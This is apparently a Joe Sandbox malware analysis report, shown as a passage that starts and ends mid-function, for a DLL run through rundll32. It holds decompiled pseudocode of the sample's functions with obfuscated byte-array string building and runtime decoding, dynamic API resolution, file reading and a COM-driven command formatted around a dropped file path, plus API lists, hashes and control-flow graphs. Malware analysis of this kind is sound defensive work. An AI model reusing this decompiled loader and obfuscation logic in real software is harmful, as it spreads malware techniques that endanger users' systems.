								_v308(_t311);
							}
						}
					}
				}
				return E6E778727(_t279, _v8 ^ _t327, _t303, _t311, _t318);
			}











































































































































                                                      0x6e775eb2
                                                      0x6e775eb9
                                                      0x6e775ebf
                                                      0x6e775ec5
                                                      0x6e775ecc
                                                      0x6e775ed3
                                                      0x6e775eda
                                                      0x6e775ee1
                                                      0x6e775ee8
                                                      0x6e775eef
                                                      0x6e775ef6
                                                      0x6e775efd
                                                      0x6e775f04
                                                      0x6e775f0b
                                                      0x6e775f12
                                                      0x6e775f19
                                                      0x6e775f20
                                                      0x6e775f27
                                                      0x6e775f2e
                                                      0x6e775f35
                                                      0x6e775f3c
                                                      0x6e775f43
                                                      0x6e775f50
                                                      0x6e775f60
                                                      0x6e775f61
                                                      0x6e775f63
                                                      0x6e775f65
                                                      0x6e775f71
                                                      0x6e775f77
                                                      0x6e775f7a
                                                      0x6e775f7d
                                                      0x6e775f7e
                                                      0x6e775f80
                                                      0x6e775f87
                                                      0x6e775f88
                                                      0x6e775f8d
                                                      0x6e775f8d
                                                      0x6e775f94
                                                      0x6e775f9a
                                                      0x6e775fa7
                                                      0x6e775faf
                                                      0x6e775fb4
                                                      0x6e775fc1
                                                      0x6e775fc8
                                                      0x6e775fcf
                                                      0x6e775fd6
                                                      0x6e775fdd
                                                      0x6e775fe4
                                                      0x6e775feb
                                                      0x6e775ff2
                                                      0x6e775ff9
                                                      0x6e776000
                                                      0x6e776007
                                                      0x6e776014
                                                      0x6e77601b
                                                      0x6e776020
                                                      0x6e776028
                                                      0x6e776035
                                                      0x6e776037
                                                      0x6e77604e
                                                      0x6e776050
                                                      0x6e776069
                                                      0x6e77606b
                                                      0x6e776073
                                                      0x6e776079
                                                      0x6e776086
                                                      0x6e77608d
                                                      0x6e776094
                                                      0x6e77609b
                                                      0x6e7760a2
                                                      0x6e7760a8
                                                      0x6e7760af
                                                      0x6e7760b6
                                                      0x6e7760bd
                                                      0x6e7760c4
                                                      0x6e7760cb
                                                      0x6e7760d2
                                                      0x6e7760d9
                                                      0x6e7760e6
                                                      0x6e7760ec
                                                      0x6e7760f1
                                                      0x6e7760f9
                                                      0x6e776100
                                                      0x6e776106
                                                      0x6e776108
                                                      0x6e77610d
                                                      0x6e77611a
                                                      0x6e776121
                                                      0x6e776128
                                                      0x6e77612f
                                                      0x6e776136
                                                      0x6e77613d
                                                      0x6e776144
                                                      0x6e77614b
                                                      0x6e776152
                                                      0x6e776159
                                                      0x6e776160
                                                      0x6e77616d
                                                      0x6e776174
                                                      0x6e776179
                                                      0x6e776181
                                                      0x6e77618e
                                                      0x6e776190
                                                      0x6e776196
                                                      0x6e77619b
                                                      0x6e7761a7
                                                      0x6e7761a8
                                                      0x6e7761ad
                                                      0x6e7764fe
                                                      0x6e7764ff
                                                      0x6e7761b3
                                                      0x6e7761c2
                                                      0x6e7761c8
                                                      0x6e7761cc
                                                      0x00000000
                                                      0x6e7761d2
                                                      0x6e7761d2
                                                      0x6e7761d9
                                                      0x6e7761e0
                                                      0x6e7761e7
                                                      0x6e7761ee
                                                      0x6e7761f5
                                                      0x6e7761fc
                                                      0x6e776203
                                                      0x6e77620a
                                                      0x6e776217
                                                      0x6e776225
                                                      0x6e776229
                                                      0x6e77622b
                                                      0x6e77622c
                                                      0x6e77623c
                                                      0x6e77623f
                                                      0x6e776242
                                                      0x6e776243
                                                      0x6e776245
                                                      0x6e77624c
                                                      0x6e77624d
                                                      0x6e776252
                                                      0x6e776252
                                                      0x6e776259
                                                      0x6e77625f
                                                      0x6e776272
                                                      0x6e776274
                                                      0x6e776279
                                                      0x6e776291
                                                      0x6e776295
                                                      0x6e7762b3
                                                      0x6e7762c2
                                                      0x6e7762c9
                                                      0x6e7762cf
                                                      0x6e7762d5
                                                      0x6e7762dd
                                                      0x6e7762df
                                                      0x6e7762e2
                                                      0x6e7762ed
                                                      0x6e7762f6
                                                      0x6e7764de
                                                      0x6e7764de
                                                      0x6e7764e6
                                                      0x00000000
                                                      0x00000000
                                                      0x6e776303
                                                      0x6e776312
                                                      0x6e776330
                                                      0x6e776335
                                                      0x6e776337
                                                      0x6e77633a
                                                      0x6e776342
                                                      0x6e7764c6
                                                      0x6e7764cc
                                                      0x6e7764d2
                                                      0x6e7764d5
                                                      0x6e7764db
                                                      0x00000000
                                                      0x6e776348
                                                      0x6e776348
                                                      0x6e776354
                                                      0x6e77635a
                                                      0x6e776364
                                                      0x6e776370
                                                      0x00000000
                                                      0x6e77638d
                                                      0x6e77638d
                                                      0x6e77639e
                                                      0x6e7763a0
                                                      0x6e7763a8
                                                      0x00000000
                                                      0x6e7763ae
                                                      0x6e7763ae
                                                      0x6e7763b2
                                                      0x6e7763d1
                                                      0x00000000
                                                      0x6e7763d7
                                                      0x6e7763d7
                                                      0x6e7763e4
                                                      0x6e7763eb
                                                      0x6e7763f2
                                                      0x6e7763f9
                                                      0x6e776400
                                                      0x6e776407
                                                      0x6e77640e
                                                      0x6e776415
                                                      0x6e77641c
                                                      0x6e776423
                                                      0x6e77642a
                                                      0x6e776431
                                                      0x6e776438
                                                      0x6e77643f
                                                      0x6e77644c
                                                      0x6e776453
                                                      0x6e776458
                                                      0x6e776460
                                                      0x6e77646d
                                                      0x6e77646f
                                                      0x6e776474
                                                      0x6e776480
                                                      0x6e776487
                                                      0x6e776488
                                                      0x6e77648a
                                                      0x6e77648c
                                                      0x6e776491
                                                      0x6e776493
                                                      0x6e77649e
                                                      0x6e7764a6
                                                      0x6e7764a7
                                                      0x6e7764aa
                                                      0x6e7764b0
                                                      0x6e7764b7
                                                      0x6e7764b9
                                                      0x6e7764be
                                                      0x6e7764c0
                                                      0x00000000
                                                      0x6e7764c0
                                                      0x6e7764be
                                                      0x6e776491
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7763b2
                                                      0x6e7763a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e776381
                                                      0x6e776381
                                                      0x6e776381
                                                      0x6e776386
                                                      0x00000000
                                                      0x6e776388
                                                      0x00000000
                                                      0x6e776388
                                                      0x6e776386
                                                      0x00000000
                                                      0x6e77635a
                                                      0x00000000
                                                      0x6e776348
                                                      0x00000000
                                                      0x6e776342
                                                      0x6e7764ec
                                                      0x6e7764f6
                                                      0x6e776297
                                                      0x6e7762a0
                                                      0x6e7762a7
                                                      0x6e7762a7
                                                      0x6e776295
                                                      0x6e7761cc
                                                      0x6e7761ad
                                                      0x6e77650f

                                                      APIs
                                                      • GetProcAddress.KERNEL32(766E0000,00000057,6E78D378,6E78D378,00000000), ref: 6E775FA7
                                                      • GetProcAddress.KERNEL32(766E0000,00000000), ref: 6E77602F
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6E776069
                                                      • GetProcAddress.KERNEL32(766E0000,00000000), ref: 6E776100
                                                      • GetProcAddress.KERNEL32(766E0000,00000000), ref: 6E776188
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E7761BB
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 6E7761C2
                                                      • GetProcAddress.KERNEL32(766E0000,00000026), ref: 6E77626C
                                                      • ReadFile.KERNEL32(?,00000000,?,00000000,00000000), ref: 6E776291
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E776299
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7762A0
                                                      • CloseHandle.KERNEL32(?), ref: 6E7762B3
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7764EF
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7764F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AddressProc$Process$FileFree$AllocateCloseCreateHandleRead
                                                      • String ID: $ $ $#$%$%$&$&$&$'$($.$/$/$1$1$3$4$5$7$:$=$?$D$H$I$I$J$K$M$M$Q$U$U$W$W$\$]$_$b$d$f$g$i$j$j$m$n$o$r$r$u$u$~
                                                      • API String ID: 3288992489-501005118
                                                      • Opcode ID: eff8babc9ca64cd1e8d5afe8b6c819e3ae98157e1986766c92ff5942ce4b234c
                                                      • Instruction ID: 5f4d2b25a6a3e038ff98806ea036e801d1a00d8d4ae65b64fa183d43745c25dc
                                                      • Opcode Fuzzy Hash: eff8babc9ca64cd1e8d5afe8b6c819e3ae98157e1986766c92ff5942ce4b234c
                                                      • Instruction Fuzzy Hash: F10272309086E8DAEF328B648D587DABFB55F16308F4400E9C58C6B292C7B95F85CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E771636, Relevance: 108.8, APIs: 6, Strings: 56, Instructions: 347stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 347 6e771636-6e771683 call 6e77111c call 6e777b4d 352 6e771685-6e771687 347->352 353 6e77168c-6e7716b5 ObjectStublessClient9 347->353 354 6e771bb2-6e771bc0 call 6e778727 352->354 355 6e7716b7-6e7716c3 353->355 356 6e7716c5-6e7716dd 353->356 355->352 361 6e7716e5-6e7716f8 356->361 362 6e7716df-6e7716e3 356->362 365 6e7716fa-6e771706 361->365 366 6e771708-6e771715 361->366 362->355 365->362 369 6e771717-6e771719 366->369 370 6e77171b-6e771734 366->370 369->365 372 6e771736-6e77173c 370->372 373 6e77173e-6e7718a9 call 6e77111c call 6e774e62 370->373 372->369 378 6e7718ab 373->378 379 6e7718da-6e7719aa lstrcpyW lstrcatW 373->379 380 6e7718ad-6e7718d1 378->380 381 6e7719ac-6e7719b0 379->381 382 6e7719e9-6e771a0e lstrcpyW call 6e77111c call 6e7720bd 379->382 380->380 383 6e7718d3 380->383 384 6e7719b1-6e7719d7 381->384 389 6e771a13-6e771acd 382->389 383->379 384->384 386 6e7719d9-6e7719e8 384->386 386->382 390 6e771acf-6e771af5 389->390 391 6e771afe-6e771b5c lstrcpyW wsprintfW 389->391 390->390 392 6e771af7 390->392 394 6e771b5e 391->394 395 6e771b6d-6e771b7e 391->395 392->391 396 6e771b5f-6e771b62 394->396 395->396 399 6e771b80-6e771b8e 395->399 396->395 399->396 401 6e771b90-6e771bb1 399->401 401->354
                                                      C-Code - Quality: 76%
                                                      			E6E771636(signed int __ecx, signed int __edx, intOrPtr _a4, signed int _a12) {
				signed int _v8;
				short _v32;
				short _v56;
				short _v104;
				short _v628;
				short _v1172;
				char _v1176;
				char _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				char _v1206;
				char _v1207;
				char _v1208;
				char _v1209;
				char _v1210;
				char _v1211;
				char _v1212;
				char _v1213;
				char _v1214;
				char _v1215;
				char _v1216;
				char _v1217;
				char _v1218;
				char _v1219;
				char _v1220;
				char _v1221;
				char _v1222;
				char _v1223;
				char _v1224;
				char _v1225;
				char _v1226;
				char _v1227;
				short _v1228;
				char _v1232;
				char _v1233;
				char _v1234;
				char _v1235;
				char _v1236;
				char _v1237;
				char _v1238;
				char _v1239;
				char _v1240;
				char _v1241;
				char _v1242;
				char _v1243;
				char _v1244;
				char _v1245;
				char _v1246;
				char _v1247;
				char _v1248;
				char _v1249;
				char _v1250;
				char _v1251;
				char _v1252;
				char _v1253;
				char _v1254;
				char _v1255;
				short _v1256;
				char _v1258;
				char _v1259;
				char _v1260;
				char _v1261;
				char _v1262;
				char _v1263;
				char _v1264;
				char _v1265;
				char _v1266;
				char _v1267;
				char _v1268;
				char _v1269;
				char _v1270;
				char _v1271;
				char _v1272;
				char _v1273;
				char _v1274;
				char _v1275;
				char _v1276;
				char _v1277;
				char _v1278;
				char _v1279;
				char _v1280;
				char _v1281;
				char _v1282;
				char _v1283;
				char _v1284;
				char _v1285;
				char _v1286;
				char _v1287;
				char _v1288;
				char _v1289;
				char _v1290;
				char _v1291;
				char _v1292;
				char _v1293;
				char _v1294;
				char _v1295;
				char _v1296;
				char _v1297;
				char _v1298;
				char _v1299;
				char _v1300;
				char _v1301;
				char _v1302;
				char _v1303;
				short _v1304;
				intOrPtr _v1308;
				signed int _v1312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t207;
				void* _t213;
				intOrPtr* _t214;
				intOrPtr* _t216;
				void* _t217;
				intOrPtr* _t218;
				void* _t219;
				intOrPtr* _t220;
				void* _t221;
				intOrPtr* _t222;
				void* _t223;
				intOrPtr* _t250;
				void* _t251;
				intOrPtr* _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr* _t257;
				void* _t261;
				intOrPtr* _t262;
				char _t287;
				intOrPtr _t292;
				intOrPtr _t293;
				intOrPtr* _t294;
				signed int _t295;
				intOrPtr _t298;
				intOrPtr* _t302;
				void* _t303;
				void* _t305;
				char _t306;
				char _t319;
				signed int _t320;
				signed int _t322;

				_t207 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t207 ^ _t322;
				_v1308 = _a4;
				_t287 = 0;
				_t320 = __ecx;
				_v1312 = _a12;
				_t318 = __edx;
				_v1204 = 0;
				_push( &_v1204);
				_t8 = E6E77111C() + 0xc; // 0xc, executed
				_t213 = E6E777B4D(_t8); // executed
				if(_t213 >= 0) {
					_t214 = _v1204;
					_push( &_v1196);
					_v1196 = 0;
					_push( &_v1192);
					_push(0);
					_push(_v1308);
					_push(_t214); // executed
					if( *((intOrPtr*)( *_t214 + 0xc))() >= 0) {
						_t216 = _v1196;
						_t217 =  *((intOrPtr*)( *_t216 + 0x10))(_t216, _t320, __edx);
						_t218 = _v1196;
						_t292 =  *_t218;
						if(_t217 >= 0) {
							_t219 =  *((intOrPtr*)(_t292 + 0x6c))(_t218, 0x2a30);
							_t220 = _v1196;
							_t293 =  *_t220;
							if(_t219 >= 0) {
								_t221 =  *((intOrPtr*)(_t293 + 0x74))(_t220, 0);
								_t222 = _v1196;
								if(_t221 >= 0) {
									_t310 =  &_v1200;
									_v1200 = 0;
									_t294 =  *_t222;
									_t223 =  *_t294(_t222, 0x6e7851b0,  &_v1200); // executed
									if(_t223 >= 0) {
										_push(_t294);
										_t295 = E6E77111C();
										E6E774E62(_t295, __edx,  &_v628);
										_v1304 = 0x71;
										_v1303 = 0x3a;
										_v1302 = 0x6d;
										_v1301 = 0x3a;
										_v1300 = 0xd;
										_v1299 = 0x3a;
										_v1298 = 0x5f;
										_v1297 = 0x3a;
										_v1296 = 0xc;
										_v1295 = 0x3a;
										_v1294 = 0x4f;
										_v1293 = 0x3a;
										_v1292 = 0xc;
										_v1291 = 0x3a;
										_v1290 = 0x52;
										_v1289 = 0x3a;
										_v1288 = 0x43;
										_v1287 = 0x3a;
										_v1286 = 0x71;
										_v1285 = 0x3a;
										_v1284 = 0x18;
										_v1283 = 0x3a;
										_v1282 = 0x6e;
										_v1281 = 0x3a;
										_v1280 = 0x79;
										_v1279 = 0x3a;
										_v1278 = 0x2e;
										_v1277 = 0x3a;
										_v1276 = 0x6a;
										_v1275 = 0x3a;
										_v1274 = 0x6a;
										_v1273 = 0x3a;
										_v1272 = 0x7b;
										_v1271 = 0x3a;
										_v1270 = 0x34;
										_v1269 = 0x3a;
										_v1268 = 0x16;
										_v1267 = 0x3a;
										_v1266 = 0x75;
										_v1265 = 0x3a;
										_v1264 = 0x45;
										_v1263 = 0x3a;
										_v1262 = 0x75;
										_v1261 = 0x3a;
										_v1260 = 0x3a;
										_v1259 = 0x3a;
										_v1258 = 0;
										_t318 = 0x7f;
										if(_v1258 == 0) {
											_t306 = 0;
											do {
												asm("cdq");
												asm("cdq");
												 *(_t322 + _t306 - 0x514) = (_t318 + (( *(_t322 + _t306 - 0x514) & 0x000000ff) - 0x3a) * 0x22 % _t318) % _t318;
												_t306 = _t306 + 1;
											} while (_t306 < 0x2e);
											_v1258 = 1;
										}
										_t320 = lstrcpyW;
										lstrcpyW( &_v104,  &_v1304);
										lstrcatW( &_v628,  &_v104);
										_v1228 = 0x66;
										_v1227 = 0x19;
										_v1226 = 0x15;
										_v1225 = 0x19;
										_v1224 = 0x3f;
										_v1223 = 0x19;
										_v1222 = 0x28;
										_v1221 = 0x19;
										_v1220 = 7;
										_v1219 = 0x19;
										_v1218 = 0x73;
										_v1217 = 0x19;
										_v1216 = 0x1b;
										_v1215 = 0x19;
										_v1214 = 0x73;
										_v1213 = 0x19;
										_v1212 = 7;
										_v1211 = 0x19;
										_v1210 = 0x10;
										_v1209 = 0x19;
										_v1208 = 0x19;
										_v1207 = 0x19;
										_v1206 = _t287;
										if(_v1206 == _t287) {
											_push(0x7f);
											_t319 = _t287;
											do {
												_t305 = 0x19;
												_t295 = _t305 - ( *(_t322 + _t319 - 0x4c8) & 0x000000ff);
												asm("cdq");
												asm("cdq");
												 *(_t322 + _t319 - 0x4c8) = (lstrcpyW + _t295 * 0x1b % lstrcpyW) % lstrcpyW;
												_t319 = _t319 + 1;
											} while (_t319 < 0x16);
											_t320 = lstrcpyW;
											_v1206 = 1;
											_t318 = 0x7f;
										}
										lstrcpyW( &_v32,  &_v1228);
										_push(_t295);
										_push(_t295);
										_v1176 = _t287;
										_t141 = E6E77111C() + 0x18; // 0x18, executed
										E6E7720BD(_t141, _t295,  &_v1176); // executed
										_v1256 = 0x4a;
										_v1255 = 0x14;
										_v1254 = 0x4e;
										_v1253 = 0x14;
										_v1252 = 0x4d;
										_v1251 = 0x14;
										_v1250 = 0x4a;
										_v1249 = 0x14;
										_v1248 = 0x4e;
										_v1247 = 0x14;
										_v1246 = 0x13;
										_v1245 = 0x14;
										_v1244 = 0x4a;
										_v1243 = 0x14;
										_v1242 = 0x4e;
										_v1241 = 0x14;
										_v1240 = 0x4d;
										_v1239 = 0x14;
										_v1238 = 0x4a;
										_v1237 = 0x14;
										_v1236 = 0x1a;
										_v1235 = 0x14;
										_v1234 = 0x14;
										_v1233 = 0x14;
										_v1232 = _t287;
										if(_v1232 == _t287) {
											do {
												_t303 = 0x14;
												asm("cdq");
												asm("cdq");
												 *(_t322 + _t287 - 0x4e4) = (_t318 + (_t303 - ( *(_t322 + _t287 - 0x4e4) & 0x000000ff)) * 0x2c % _t318) % _t318;
												_t287 = _t287 + 1;
											} while (_t287 < 0x18);
											_v1232 = 1;
										}
										lstrcpyW( &_v56,  &_v1256);
										wsprintfW( &_v1172,  &_v56,  &_v628, "C:\Users\Albus\ndgfht.frg",  &_v32, _v1176);
										_t250 = _v1200;
										_t310 =  &_v628;
										_t251 =  *((intOrPtr*)( *_t250 + 0x8c))(_t250,  &_v628,  &_v1172);
										_t252 = _v1200;
										_t298 =  *_t252;
										if(_t251 >= 0) {
											_t253 =  *((intOrPtr*)(_t298 + 0x5c))(_t252, 2);
											_t254 = _v1200;
											_push(_t254);
											_t298 =  *_t254;
											if(_t253 < 0) {
												goto L26;
											} else {
												_t261 =  *((intOrPtr*)(_t298 + 0x1c))();
												_t262 = _v1200;
												_push(_t262);
												_t298 =  *_t262;
												if(_t261 < 0) {
													goto L26;
												} else {
													 *((intOrPtr*)(_t298 + 8))();
													_t302 = _v1204;
													_t310 =  *_t302;
													 *((intOrPtr*)( *_t302 + 8))(_t302);
													_t318 = _v1312;
													_t320 =  &_v1192;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
												}
											}
										} else {
											_push(_t252);
											L26:
											 *((intOrPtr*)(_t298 + 0x20))();
											_t218 = _v1200;
											goto L8;
										}
									} else {
										_t222 = _v1196;
										goto L10;
									}
								} else {
									L10:
									_t293 =  *_t222;
									goto L7;
								}
							} else {
								L7:
								 *((intOrPtr*)(_t293 + 0x20))(_t222);
								_t218 = _v1196;
								L8:
								_t292 =  *_t218;
								goto L5;
							}
						} else {
							L5:
							 *((intOrPtr*)(_t292 + 8))(_t218);
							goto L3;
						}
					} else {
						L3:
						_t257 = _v1204;
						 *((intOrPtr*)( *_t257 + 8))(_t257);
						goto L1;
					}
				} else {
					L1:
				}
				return E6E778727(_t287, _v8 ^ _t322, _t310, _t318, _t320);
			}



















































































































































                                                      0x6e77163f
                                                      0x6e771646
                                                      0x6e77164e
                                                      0x6e771654
                                                      0x6e771659
                                                      0x6e77165c
                                                      0x6e771662
                                                      0x6e77166a
                                                      0x6e771670
                                                      0x6e771679
                                                      0x6e77167c
                                                      0x6e771683
                                                      0x6e77168c
                                                      0x6e771698
                                                      0x6e77169f
                                                      0x6e7716a5
                                                      0x6e7716a8
                                                      0x6e7716a9
                                                      0x6e7716af
                                                      0x6e7716b5
                                                      0x6e7716c5
                                                      0x6e7716d0
                                                      0x6e7716d5
                                                      0x6e7716db
                                                      0x6e7716dd
                                                      0x6e7716eb
                                                      0x6e7716f0
                                                      0x6e7716f6
                                                      0x6e7716f8
                                                      0x6e77170a
                                                      0x6e77170f
                                                      0x6e771715
                                                      0x6e77171b
                                                      0x6e771721
                                                      0x6e771727
                                                      0x6e771730
                                                      0x6e771734
                                                      0x6e77173e
                                                      0x6e77174b
                                                      0x6e77174d
                                                      0x6e771752
                                                      0x6e771759
                                                      0x6e771760
                                                      0x6e771767
                                                      0x6e77176e
                                                      0x6e771775
                                                      0x6e77177c
                                                      0x6e771783
                                                      0x6e77178a
                                                      0x6e771791
                                                      0x6e771798
                                                      0x6e77179f
                                                      0x6e7717a6
                                                      0x6e7717ad
                                                      0x6e7717b4
                                                      0x6e7717bb
                                                      0x6e7717c2
                                                      0x6e7717c9
                                                      0x6e7717d0
                                                      0x6e7717d7
                                                      0x6e7717de
                                                      0x6e7717e5
                                                      0x6e7717ec
                                                      0x6e7717f3
                                                      0x6e7717fa
                                                      0x6e771801
                                                      0x6e771808
                                                      0x6e77180f
                                                      0x6e771816
                                                      0x6e77181d
                                                      0x6e771824
                                                      0x6e77182b
                                                      0x6e771832
                                                      0x6e771839
                                                      0x6e771840
                                                      0x6e771847
                                                      0x6e77184e
                                                      0x6e771855
                                                      0x6e77185c
                                                      0x6e771863
                                                      0x6e77186a
                                                      0x6e771871
                                                      0x6e771878
                                                      0x6e77187f
                                                      0x6e771886
                                                      0x6e77188d
                                                      0x6e77189a
                                                      0x6e7718a2
                                                      0x6e7718a9
                                                      0x6e7718ab
                                                      0x6e7718ad
                                                      0x6e7718bd
                                                      0x6e7718c3
                                                      0x6e7718c6
                                                      0x6e7718cd
                                                      0x6e7718ce
                                                      0x6e7718d3
                                                      0x6e7718d3
                                                      0x6e7718da
                                                      0x6e7718eb
                                                      0x6e7718f8
                                                      0x6e7718fe
                                                      0x6e771905
                                                      0x6e77190c
                                                      0x6e771913
                                                      0x6e77191a
                                                      0x6e771921
                                                      0x6e771928
                                                      0x6e77192f
                                                      0x6e771936
                                                      0x6e77193d
                                                      0x6e771944
                                                      0x6e77194b
                                                      0x6e771952
                                                      0x6e771959
                                                      0x6e771960
                                                      0x6e771967
                                                      0x6e77196e
                                                      0x6e771975
                                                      0x6e77197c
                                                      0x6e771983
                                                      0x6e77198a
                                                      0x6e771991
                                                      0x6e77199e
                                                      0x6e7719aa
                                                      0x6e7719ac
                                                      0x6e7719ae
                                                      0x6e7719b1
                                                      0x6e7719bd
                                                      0x6e7719be
                                                      0x6e7719c3
                                                      0x6e7719c9
                                                      0x6e7719cc
                                                      0x6e7719d3
                                                      0x6e7719d4
                                                      0x6e7719d9
                                                      0x6e7719e1
                                                      0x6e7719e8
                                                      0x6e7719e8
                                                      0x6e7719f4
                                                      0x6e7719f6
                                                      0x6e7719f7
                                                      0x6e7719fe
                                                      0x6e771a0b
                                                      0x6e771a0e
                                                      0x6e771a13
                                                      0x6e771a1a
                                                      0x6e771a21
                                                      0x6e771a28
                                                      0x6e771a2f
                                                      0x6e771a36
                                                      0x6e771a3d
                                                      0x6e771a44
                                                      0x6e771a4b
                                                      0x6e771a52
                                                      0x6e771a59
                                                      0x6e771a60
                                                      0x6e771a67
                                                      0x6e771a6e
                                                      0x6e771a75
                                                      0x6e771a7c
                                                      0x6e771a83
                                                      0x6e771a8a
                                                      0x6e771a91
                                                      0x6e771a98
                                                      0x6e771a9f
                                                      0x6e771aa6
                                                      0x6e771aad
                                                      0x6e771ab4
                                                      0x6e771ac1
                                                      0x6e771acd
                                                      0x6e771acf
                                                      0x6e771adb
                                                      0x6e771ae1
                                                      0x6e771ae7
                                                      0x6e771aea
                                                      0x6e771af1
                                                      0x6e771af2
                                                      0x6e771af7
                                                      0x6e771af7
                                                      0x6e771b09
                                                      0x6e771b2c
                                                      0x6e771b32
                                                      0x6e771b44
                                                      0x6e771b4c
                                                      0x6e771b54
                                                      0x6e771b5a
                                                      0x6e771b5c
                                                      0x6e771b70
                                                      0x6e771b75
                                                      0x6e771b7b
                                                      0x6e771b7c
                                                      0x6e771b7e
                                                      0x00000000
                                                      0x6e771b80
                                                      0x6e771b80
                                                      0x6e771b85
                                                      0x6e771b8b
                                                      0x6e771b8c
                                                      0x6e771b8e
                                                      0x00000000
                                                      0x6e771b90
                                                      0x6e771b90
                                                      0x6e771b93
                                                      0x6e771b9a
                                                      0x6e771b9c
                                                      0x6e771b9f
                                                      0x6e771ba5
                                                      0x6e771bae
                                                      0x6e771baf
                                                      0x6e771bb0
                                                      0x6e771bb1
                                                      0x6e771bb1
                                                      0x6e771b8e
                                                      0x6e771b5e
                                                      0x6e771b5e
                                                      0x6e771b5f
                                                      0x6e771b5f
                                                      0x6e771b62
                                                      0x00000000
                                                      0x6e771b62
                                                      0x6e771736
                                                      0x6e771736
                                                      0x00000000
                                                      0x6e771736
                                                      0x6e771717
                                                      0x6e771717
                                                      0x6e771717
                                                      0x00000000
                                                      0x6e771717
                                                      0x6e7716fa
                                                      0x6e7716fa
                                                      0x6e7716fb
                                                      0x6e7716fe
                                                      0x6e771704
                                                      0x6e771704
                                                      0x00000000
                                                      0x6e771704
                                                      0x6e7716df
                                                      0x6e7716df
                                                      0x6e7716e0
                                                      0x00000000
                                                      0x6e7716e0
                                                      0x6e7716b7
                                                      0x6e7716b7
                                                      0x6e7716b7
                                                      0x6e7716c0
                                                      0x00000000
                                                      0x6e7716c0
                                                      0x6e771685
                                                      0x6e771685
                                                      0x6e771685
                                                      0x6e771bc0

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                        • Part of subcall function 6E777B4D: CoCreateInstance.OLE32(6E7851A0,00000000,00000004,6E785190,?,00000000), ref: 6E777BC2
                                                      • ObjectStublessClient9.OLE32(?,?,00000000,?,?,?), ref: 6E7716B0
                                                      • lstrcpyW.KERNEL32(?,00000071), ref: 6E7718EB
                                                      • lstrcatW.KERNEL32 ref: 6E7718F8
                                                      • lstrcpyW.KERNEL32(?,00000066), ref: 6E7719F4
                                                      • lstrcpyW.KERNEL32(?,0000004A), ref: 6E771B09
                                                      • wsprintfW.USER32 ref: 6E771B2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: lstrcpy$Client9CreateH_prolog3InstanceObjectStublesslstrcatwsprintf
                                                      • String ID: ($.$4$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$?$C$C:\Users\user\ndgfht.frg$E$J$J$J$J$M$M$N$N$N$O$R$_$f$j$j$m$n$q$q$s$s$u$u$y${
                                                      • API String ID: 319016583-1767438267
                                                      • Opcode ID: 325a05f57da399e55aed9881404a83d4ef33a4f0f687619e883d8e25a0e2fed2
                                                      • Instruction ID: 28ce0bcdb8d3d847317d8c15656f5d11e679f3744b1d2f76aea55c4033298d39
                                                      • Opcode Fuzzy Hash: 325a05f57da399e55aed9881404a83d4ef33a4f0f687619e883d8e25a0e2fed2
                                                      • Instruction Fuzzy Hash: 800213B09082D9CDDF22C668CD58BD9BFB96F16308F0440D9D2896B252C7755F89CF26
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77118E, Relevance: 101.8, APIs: 1, Strings: 57, Instructions: 269COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 96%
                                                      			E6E77118E(void* __eflags) {
				char _t248;
				void* _t269;
				void* _t271;
				signed int _t278;
				char _t289;
				void* _t290;

				_push(0xa4);
				E6E784397();
				 *((char*)(_t290 - 0x9c)) = 0x24;
				 *((char*)(_t290 - 0x9b)) = 0x16;
				 *((char*)(_t290 - 0x9a)) = 0xf;
				_t248 = 0;
				 *((char*)(_t290 - 0x99)) = 0x42;
				 *((char*)(_t290 - 0x98)) = 0x16;
				 *((char*)(_t290 - 0x97)) = 0x1c;
				 *((char*)(_t290 - 0x96)) = 0x58;
				 *((char*)(_t290 - 0x95)) = 0x45;
				 *((char*)(_t290 - 0x94)) = 0x78;
				 *((char*)(_t290 - 0x93)) = 3;
